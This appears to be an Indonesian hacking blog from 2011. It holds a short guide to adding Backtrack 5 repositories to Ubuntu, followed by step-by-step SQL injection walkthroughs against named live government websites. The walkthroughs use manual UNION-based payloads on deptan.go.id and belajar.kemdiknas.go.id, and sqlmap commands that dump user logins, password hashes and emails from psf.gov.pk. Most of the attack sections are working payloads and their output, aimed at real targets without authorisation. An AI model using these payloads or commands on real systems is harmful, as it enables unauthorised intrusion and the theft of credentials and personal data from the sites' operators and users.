30 September 2011

Backtrack 5 in Ubuntu 10


Hello .. :D

Mungkin banyak dari kita yang sudah tau soal distro Backtrack , jadi gak perlu saya terangkan lagi. nah untuk saat ini saya akan sedikit ngasih tips untuk menambahkan Repository Backtrack 5 di Ubuntu 10. kebetulan saya make ubuntu 10.

Berikut cara menambahkan Repository BT 5 in Ubuntu 10 :

1. Downloads key backtrack di sini :
 
code :

wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add -

2. Edit source list repository ubuntu


code :


sudo gedit /etc/apt/sources.list

code :


deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing


atau bisa dari "Synaptic Package Manager"




And then run :

# sudo apt-get update

Anda cukup ke System -->> Administrator -->> Synaptic Package Manager Trus Install atau lewat ubuntu software.



Selesai deh, cukup gitu doang kok gak repot,
dan saya udah buktiin :D



SQLi on Deptan.go.id


Sebenarnya ini udah merupakan bug lama yang sampe sekarang belum di patch ! Cuma untung servernya "safe mode : off" , but remember.. nothing secure :D Tapi banyak cara menuju roma, watch yours system !

Vull : http://www.deptan.go.id/tampil.php?page=kelembagaan&id=31
1=1 true ..
1=0 false ..

Code :

tampil.php?page=kelembagaan&id=31 order by 10-- false
tampil.php?page=kelembagaan&id=31 order by 9 -- true

Code:

tampil.php?page=kelembagaan&id=31 and 1=1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9--
tampil.php?page=kelembagaan&id=-31and 1=1 union all select1,2,3,4,5,6,7,8,9-- Hasilnya = 4

versinya :
tampil.php?page=kelembagaan&id=-31 and 1=1 union all select1,2,3,version(),5,6,7,8,9-- 

hasilnya : 5.0.45-standard-log

usernya :
tampil.php?page=kelembagaan&id=-31 and 1=1 union all select1,2,3,@@datadir,5,6,7,8,9-- hasilnya = /opt/coolstack/mysql_32bit/data/ /

Some Info :
- version() = versinya
- database() = databsenya
- user() = usernya
- @@datadir = data direktorinya

Code:

tampil.php?page=kelembagaan&id=-31 and 1=1 union all select 1,2,3,CHAR(97, 108, 100, 106, 97, 122, 97, 114, 97),5,6,7,8,9--

tablenya :

# tampil.php?page=kelembagaan&id=-31 and 1=1 union all select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables where table_schema=database()—


--------------------------------------------------------------


You can continue yourself, because some reason :)



Sqlmap Tool For Beginners


Sql Injection merupakan tekhnik dari sekian tekhnik yang sering di lakukan oleh hacker dalam melakukan penetrasi. Hal ini dikarenakan bug sql injection sering kita jumpai pada banyak website di internet.

Nah, kali ini saya coba sharing cara hacking dengan tekhnik sql injection. Akan tetapi dengan bantuan tool SqlMap. Terimakasih tentunya untuk pengembangnya yakni Bernardo Damele AG & Miroslav Stampar yang telah mempermudah kita untuk melakukan penetrasi.

Aplikasi mendukung beberapa database : MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
Enam tekhnik sql-injection : boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band. Dan fitur - fitur lain sebagainya..

Nah bagi anda pengguna windows xp, vista, 7 dan 8,  anda pun dapat menggunakannya.
Yakni dengan install  python di komputer anda. Silahkan download kedua paket ini :

Phyton :   http://www.python.org/download/
Sqlmap :     http://sqlmap.sourceforge.net/

Cukup download Sqlmap dan letakkan di direktori PC kita. Disini saya misalkan sqlmap di direktori C:


1. Sqlmap Live Target

Tentunya saya akan coba penetrasi pada website target, moga-moga paham :)

Web target : http://www.psf.gov.pk/staffdetail.php?id=10

code :     
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 --dbs

available databases [2]:
[*] information_schema
[*] psfdb

code :      
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 --tables psfd

 +-----------------------------------+
| user                                    |
| users_site                           |
| wp_commentmeta               |
| wp_comments                     |
| wp_links                             |
| wp_options                         |
| wp_options2                       |
| wp_postmeta                      |
| wp_posts                            |
| wp_term_relationships        |
| wp_term_taxonomy             |
| wp_terms                            |
| wp_usermeta                       |
| wp_users                             |
+-----------------------------------+

 
code :
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 --columns -D psfdb -T wp_users 

 

+---------------------------+-------------------------+
| Column                    | Type                       |
+---------------------------+-------------------------+
| display_name           | varchar(250)            |
| ID                            | bigint(20) unsigned  |
| user_activation_key | varchar(60)              |
| user_email               | varchar(100)            |
| user_login                | varchar(60)             |
| user_nicename         | varchar(50)             |
| user_pass                 | varchar(64)             |
| user_registered        | datetime                 |
| user_status               | int(11)                    |
| user_url                    | varchar(100)           |
+---------------------------+------------------------+


code :
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 --dump -D psfdb -T wp_users

code:
C:\Hack\sql\sqlmap>sqlmap.py -u www.psf.gov.pk/staffdetail.php?id=10 -D psfdb -T wp_users -C user_login,user_pass,user_email --dump 

Than tou will see the dump database in C:\Hack\sql\sqlmap\output


2. Some Powerfull Command Sqlmap



sqlmap.py -d "mysql://admin:admin@192.168.21.17:3306/testdb" -f --banner --dbs --users

sqlmap.py -u "http://www.target.com/vuln.php?id=1" -f --banner --dbs --users

sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users (HTTP Data)

sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs --users

sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=1" \
--auth-type Basic --auth-cred "testuser:testpass"


sqlmap.py -u "http://www.target.com/vuln.php?id=1&hash=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib;hash=hashlib.md5(id).hexdigest()"

sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tamper \
tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns \
-D testdb -T users -C name (Enumerate database table columns)



Jika ingin lebih mengetauhi perintah - perintah di sqlmap.

Kita bisa mendapatkan pencerahan di sini

Goodluck !




28 September 2011

SQLi belajar.kemdiknas.go.id


Disini saya gak bermaksud untuk merusak ataupun show-off yah :) 
saya akan coba sharing yang namanya basic-SQLi karena kalau untuk pemula error based merupakan dasar kita untuk advance sql injection. 
itung-itung bisa lancar manualnya, oke kita langsung aja yah :)
1. Vull sql injection :
http://belajar.kemdiknas.go.id/index.php?display=home&forum=1&IDMP=0&IDkls=99999999

Code :

IDkls=99999999 order by 10-- false
IDkls=99999999 order by 9-- false
IDkls=99999999 order by 8-- false
IDkls=99999999 order by 7-- false
IDkls=99999999 order by 6-- true

Oke .. berarti true kita di " order by 6-- "
Berarti adalah valid kolomnya.

2. Sekarang cari valid string atau no togel :

code :

IDkls=99999999+union+all+select+1,2,3,4,5,6--

- Perhatikan angka yang keluar ( paling atas/top page) yups.. "4"
- Angka 4 ini merupakan valid stringnya.

3. Menampilkan versinya :

code :

IDkls=-99999999+union+all+select+1,2,3,version(),5,6--

- versi : 5.1.41-3ubuntu12.99
- ganti angka 4 dengan : version(), database(), @@version dsb .


4. Menampilkan Table DB :

code:

IDkls=-99999999+union+all+select+1,2,3,group_concat(table_name),5,6+from+information_schema.tables+where+table_schema=database()--

- group_concat = perintah untuk menampilkan
- (table_name) = nama - nama table

5. Menampilkan Columnnya :

IDkls=-99999999+union+all+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_schema=database()--

Cukup ganti :
(table_name) dengan (column_name)
information_schema.tables" dengan information_schema.columns

6. Oke.. Kita cari table dari users :

code:

IDkls=-99999999+union+all+select+1,2,3,group_concat(username,0x3a,password),5,6 from users--